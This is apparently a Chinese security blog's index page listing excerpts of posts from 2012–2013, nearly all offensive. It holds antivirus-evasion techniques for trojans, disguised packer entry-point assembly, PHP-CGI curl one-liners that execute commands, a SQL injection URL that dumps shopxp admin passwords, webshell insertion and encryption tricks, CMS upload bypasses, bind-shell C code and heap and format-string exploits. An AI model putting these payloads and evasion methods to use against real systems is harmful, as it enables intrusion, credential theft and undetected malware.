上一页 1 ··· 6 7 8 9 10 11 12 13 14 下一页
摘要: 1.伪装c++代码:push ebpmov ebp,esppush -1push 111111push 222222mov eax,fs:[0]push eaxmov fs:[0],esppop eaxmov fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址************************************************************************2.伪装Microsoft Visual C++ 6.0代码:PUSH -1PUSH 0PUSH 0MOV EAX,DWORD P 阅读全文
posted @ 2013-02-24 22:18 山貓 阅读(519) 评论(0) 推荐(0) 编辑
摘要: 上次我们详细讲解了MYCCL特征码定位器的文件特征码定位,这次我们详细讲解内存特征码的定位。内存特征码定位前,我们必须要对木马的文件特征码进行特征码查找并用0填充免杀,然后才可以进行内存特征码的查找定位,这是必须的。上次教程,我已经对此进行了说明。再有我们要用哪个杀毒软件进行内存定位,就必须要这个杀毒软件进行文件特征码的免杀。比如有的朋友用卡巴进行文件特征码的定位,再用瑞星进行内存特征码的定位,这是错误的。在开始内存特征码定位前,我们要把内特辅助定位器TK.Loader和MYCCL复合特征码定位器放在同一个目录下,内特辅助定位器TK.Loader它的作用就是把我们生成的木马加载进内存里,以供杀 阅读全文
posted @ 2013-02-05 19:29 山貓 阅读(2607) 评论(0) 推荐(0) 编辑
摘要: 一、脱壳基础知识 1、脱壳的概念 在第三章中讲了加壳的概念,与加壳技术相对的就是脱壳技术了。脱壳就是将已经加壳的程序从壳中剥离出来。既然能给程序进行加壳,那也会有相应的脱壳方法。尽管理在有些壳很难脱掉,但是脱壳技术也在不断的进步,而且在不断竞争中发展状大。 2、OEP OPE的意思就像它的名字一样容易理解。OEP就是原程序的入口点,也就是真正的入口点。 当被加壳的程序运行后,首先运行的是壳程序,壳程序会将原程序还原到内存中并将控制权返还。OEP总会在这期间被脱壳者找到。只要找到这个OEP,就可以将原程序从内存中dump出来,而后针对dump出的程序进行处理,最终得到原程序。 一般来... 阅读全文
posted @ 2013-02-02 16:15 山貓 阅读(403) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.sa666.com/thread-25247-1-1.html发布时间:2012-4.26发布作者:佚名漏洞类型:注入漏洞、上传漏洞漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面, 然后访问“/member/ajax_membergroup. 阅读全文
posted @ 2013-01-25 16:30 山貓 阅读(2135) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.myhack58.com/Article/html/3/62/2009/23871.htm<?/*serv-u 7 local exp ver 1.0www.inbreak.netauthor kxlzx@xiaotou.org 2008-11-19modify 2008-11-20 *//*下面是用到的主要数据包,给大家研究用。如果你用asp等语言再写一次,可以参考。Global user list:GET /Admin/XML/OrganizationUsers.xml&ID=161&sync=1227078625078&Force 阅读全文
posted @ 2013-01-22 18:10 山貓 阅读(495) 评论(0) 推荐(0) 编辑
摘要: 转自:http://acmfly.blog.163.com/blog/static/184049084201242001024914/1、本地包含直接执行代码:curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n2、远程包含执行代码:curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepe 阅读全文
posted @ 2013-01-19 13:36 山貓 阅读(337) 评论(0) 推荐(0) 编辑
摘要: 漏洞版本:shopxp网上购物系统 v7.4关键词:inurl:shopxp_news.aspshopxp_news.asp暴密码的语句:/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 阅读全文
posted @ 2013-01-18 11:54 山貓 阅读(475) 评论(0) 推荐(0) 编辑
摘要: 转自:http://hi.baidu.com/jsexp/item/36a73a0b4297bc133b53ee7b插入一句话这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如 http://xx.com/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 可在http://xx.com/sqlin.asp写入一句话,密码a 阅读全文
posted @ 2013-01-18 10:29 山貓 阅读(312) 评论(0) 推荐(0) 编辑
摘要: http://www.md5decrypter.co.uk/很棒,据说数据量为130亿条,个人查询下来感觉不错,很多国内的收费数据在上面都可以免费查到。xfyy888这个数据在国内三个网站上都是需要付费的,此站可以查询到。注:这个站的验证码是区分大小写的,注意一下。http://hashkiller.com/index.php?action=md5webcrack很强大,需要登陆论坛才能解密,点击右上角的“register”进行注册,都是一些简单的单词,应该能看懂吧?http://www.md5this.com/crack-it-/index.php呃,貌似可以后台破解,如果破解出来的话会Em 阅读全文
posted @ 2013-01-17 03:30 山貓 阅读(1342) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.netknight.in/archives/28/1、ckfinder上传漏洞ckfinder是一个AJAX的文件管理工具,配合ckeditor用于网站上传、管理文件。但是ckfinder/ckfinder.html页面,访问不需特别权限。利用在IIS6.0的环境下的解析漏洞可拿webshell。2、ckeditor上传漏洞http://www.netknight.in/manage/ckfinder/ckfinder.html上传1.gif后再右击重命名成1.asp;.gif3、ClanSphere 2011.0集成了ckeditor编辑器(注:ckeditor是 阅读全文
posted @ 2013-01-17 03:23 山貓 阅读(11844) 评论(0) 推荐(0) 编辑
摘要: 转自:http://www.hackseo.net/post/181.html 某位朋友研究的一句话木马加密经验分享给大家: 一句话木马的加密,个人感觉,如果碰上了asp后缀的数据库,而且猜出了数据库的路径,那简直就是管理员的恶梦。因为加密后的一句话木马没有任何asp的标示符!我们只要随便找个可以提交信息的页面,比如说留言板什么的都可以,就可以把一句话木马插到数据库里面。而加密后的一句话木马是不会被过滤的。加密用的工具是ANSI2Unicode,是lake2写的。下载地址:lake2一句话加密工具|ANSI2Unicode加密转换工具 这个一句话要精心构造,加密后的一句话不能有"?& 阅读全文
posted @ 2013-01-08 17:42 山貓 阅读(605) 评论(0) 推荐(0) 编辑
摘要: C代码#include //构造socket所需的库#include //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int soc,remote; //文件描述符句柄 struct sockaddr_in serv_addr; //保存IP/端口值的结构 serv_addr.sin_addr.s_addr=0x6400A8C0; //将socket的地址设置为所有本地地址 serv_addr.sin_port=0xBBBB; //设置socket的端口48059 serv_addr.sin_f... 阅读全文
posted @ 2012-12-26 15:47 山貓 阅读(1700) 评论(1) 推荐(1) 编辑
摘要: 示例C代码#include<sys/socket.h> //构造socket所需的库#include<netinet/in.h> //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int server,client; //文件描述符句柄 struct sockaddr_in serv_addr; //保存IP/端口值的结构 server=socket(2,1,0); //建立一个本地IP socket,类型为stream(即tcp) serv_addr.sin_addr.s_addr=0; //将... 阅读全文
posted @ 2012-12-26 13:09 山貓 阅读(788) 评论(0) 推荐(0) 编辑
摘要: 实验平台:Fedora Core 1(glibc-2.3.2-101)实验前提:去掉该平台的堆执行保护:sysctl -w kernel.exec-shield=0目标漏洞代码:#//heap2.c#include<stdlib.h>#include<string.h>int main(int argc,char *argv[]){ char *buf1=malloc(300); char *buf2=malloc(20); strcpy(buf1,argv[1]); free(buf1); free(buf2); return(0);}exploit// heap e 阅读全文
posted @ 2012-12-26 10:38 山貓 阅读(1097) 评论(0) 推荐(0) 编辑
摘要: 转自:http://zjmaslow.blog.163.com/blog/static/203163062200762052725807/查看文件夹总是打开新窗口:编辑->首选项->行为->选中 总是在浏览器窗口中打开这样就不会每次都打开个新窗口了SSH远程登录中文乱码:File->Properties->Terminal->Translation 选UTF-8sh# vi /etc/sysconfig/i18n(改其内容为:LANG="zh_CN.UTF-8"SYSFONT="none"LANG="zh_C 阅读全文
posted @ 2012-12-24 12:35 山貓 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 转自:http://tech.ccidnet.com/art/1101/20050422/626639_1.html一种小堆(heap)溢出的另类利用方法bkbll(bkbll@cnhonker.net)2003-9-1[1]. 什么是堆溢出堆溢出(heap overflow) 类似stack overflow, 发生在BSS区. 关于heap overflow的文章外面有很多, 入门级别的w00w00的, 这篇文章的中文版是由warning3 撰写, 文章地址是: _blank>http://www.w00w00.org/files/articles/heaptut-chinese.t 阅读全文
posted @ 2012-12-22 22:17 山貓 阅读(416) 评论(0) 推荐(0) 编辑
摘要: 转自:http://blog.donews.com/zwell/archive/2004/08/04/59092.aspx ★ 前言通常的Heap区溢出只能利用覆盖某些函数指针,jumpbuf或者重要变量等方式来完成攻击。这方面内容请参看我原来翻译整理的<HEAP/BSS 溢出机理分析>:http://magazine.nsfocus.com/detail.asp?id=353如果系统中没有这些条件,尽管能够发生溢出,攻击者仍然很难执行自己的代码。这里介绍一种利用malloc/realloc/free来进行攻击的方法。这种方法使得Heap攻击的可能性大大增加了。注:下面所有的代码均 阅读全文
posted @ 2012-12-22 22:02 山貓 阅读(471) 评论(0) 推荐(0) 编辑
摘要: 漏洞目标代码://fmtstr.c#include<stdlib.h>int main(int argc,char *argv[]){ static int canary=0; char temp[2048]; strcpy(temp,argv[1]); printf(temp); printf("\n"); printf("Canary at 0x%08x=0x%08x\n",&canary,canary);}可以看出,漏洞代码允许用户指定printf的格式串,可自行构造[root@Lynx gray]# ./fmtstr &quo 阅读全文
posted @ 2012-12-21 10:57 山貓 阅读(477) 评论(0) 推荐(0) 编辑
摘要: 实验平台:Fedora Core 4 (做实验的必备利器平台,很好很强大,也可以用来学习鸟哥的linux私房菜,现在网上都不好找了)http://archives.fedoraproject.org/pub/archive/fedora/linux/core/4/i386/iso/ 这是官方的,相当给力,在网上还没有消失前提:去掉操作系统的堆栈执行保护和内存随机化机制sysctl -w kernel.randomize_va_space=0sysctl -w kernel.exec-shield=0在ubuntu8.04平台上可以只用第一条即可,但是redhat9.0的保护机制真的很神秘,我说 阅读全文
posted @ 2012-12-20 12:08 山貓 阅读(2258) 评论(0) 推荐(0) 编辑
摘要: 当缓冲区比较小,不足以放下shellcode时,可以利用环境变量,因为这部分内存是可写的,理论基础是:所有的Linux ELF可执行文件映射到内存时,会将最后一个相对地址映射为0xbfffffff。而环境和参数存储在该区域中,且该区域之下刚好是栈。下面是进程上部内存详细布局。攻击目标代码://samllbuff.cint main(int argc,char *argv[]){ char buff[10]; strcpy(buff,argv[1]); printf("%s\n",buff);}exploit#include<stdlib.h>#include&l 阅读全文
posted @ 2012-12-17 18:04 山貓 阅读(340) 评论(0) 推荐(0) 编辑
上一页 1 ··· 6 7 8 9 10 11 12 13 14 下一页